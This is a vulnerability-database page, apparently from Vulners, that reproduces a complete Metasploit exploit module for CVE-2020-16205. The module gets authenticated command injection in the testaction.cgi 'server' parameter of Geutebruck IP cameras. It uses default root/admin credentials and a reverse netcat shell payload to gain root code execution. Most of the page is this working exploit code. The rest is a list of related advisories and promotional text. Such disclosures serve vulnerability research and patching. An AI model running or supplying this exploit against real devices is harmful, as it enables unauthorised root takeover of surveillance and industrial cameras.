Vulners
Lucene search
Geutebruck testaction.cgi Remote Command Execution
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | Geutebruck testaction.cgi Remote Command Execution Exploit | 18 Aug 202000:00 | – | zdt |
 | CVE-2020-16205 | 28 Aug 202000:00 | – | attackerkb |
 | CVE-2020-16205 | 17 Aug 202014:33 | – | circl |
 | CVE-2020-16205 | 14 Aug 202013:56 | – | cve |
 | CVE-2020-16205 | 14 Aug 202013:56 | – | cvelist |
 | Geutebrück G-Cam and G-Code | 6 Aug 202000:00 | – | ics |
 | Geutebruck testaction.cgi Remote Command Execution | 17 Aug 202017:40 | – | metasploit |
 | CVE-2020-16205 | 14 Aug 202014:15 | – | nvd |
 | Command injection | 14 Aug 202014:15 | – | prion |
 | CVE-2020-16205 | 22 May 202515:15 | – | redhatcve |
10
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Geutebruck testaction.cgi Remote Command Execution',
'Description' => %q{
This module exploits an authenticated arbitrary command execution vulnerability within the 'server'
GET parameter of the /uapi-cgi/testaction.cgi page of Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx,
ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.25 as well as firmware
versions 1.12.13.2 and 1.12.14.5 when the 'type' GET paramter is set to 'ntp'.
Successful exploitation results in remote code execution as the root user.
},
'Author' =>
[
'Davy Douhine' # ddouhine
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2020-16205' ],
[ 'URL', 'http://geutebruck.com' ],
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/icsa-20-219-03' ],
[ 'URL', 'https://www.randorisec.fr/s05e01-rce-on-geutebruck-ip-cameras/' ]
],
'DisclosureDate' => 'May 20 2020',
'Privileged' => true,
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_ARMLE],
'Targets' => [
[ 'Automatic Target', {} ]
],
'DefaultTarget' => 0,
'DefaultOptions' =>
{
'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
}
)
)
register_options(
[
OptString.new('HttpUsername', [ true, 'The username to authenticate as', 'root' ]),
OptString.new('HttpPassword', [ true, 'The password for the specified username', 'admin' ]),
OptString.new('TARGETURI', [true, 'The path to the testaction page', '/uapi-cgi/admin/testaction.cgi']),
]
)
end
def firmware
begin
res = send_request_cgi(
'method' => 'GET',
'uri' => '/brand.xml'
)
unless res
vprint_error 'Connection failed'
return CheckCode::Unknown
end
res_xml = res.get_xml_document
@version = res_xml.at('//firmware').text
return true
end
end
def check
result = firmware
return result unless result == true
version = Gem::Version.new(@version)
vprint_status "Found Geutebruck version #{version}"
if version < Gem::Version.new('1.12.0.25') || version == Gem::Version.new('1.12.13.2') || version == Gem::Version.new('1.12.14.5')
return CheckCode::Appears
end
CheckCode::Safe
end
def exploit
print_status("#{rhost}:#{rport} - Attempting to exploit...")
send_request_cgi(
{
'method' => 'GET',
'uri' => target_uri.path,
'vars_get' => { 'type' => 'ntp', 'server' => "\n#{payload.encoded}" }
}
)
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Aug 2020 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.55176